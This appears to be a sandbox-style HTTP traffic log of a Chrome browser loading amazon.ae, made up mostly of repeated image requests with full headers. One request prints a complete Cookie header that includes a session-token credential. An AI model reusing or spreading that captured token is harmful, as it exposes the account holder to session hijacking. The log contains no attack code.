Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621419_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621420_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DC37SFEY0GDXEZ5HDEVRN:0 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621421_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621422_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763856_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-MmY4MjkxOWIt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-OTg1MGY5MmMt-w186._SY116_CB642007527_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2022/img/Events/XCM_Manual_1463368_4956629_400x400_2X._CB609908562_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31ulQWhB89L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41A1Lpkr9HL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31Id2i6D-rL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31ulQWhB89L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41gRz4miKkL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41A1Lpkr9HL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31Id2i6D-rL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31Lxe89wp8L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/416l24m+1oL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/41gRz4miKkL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
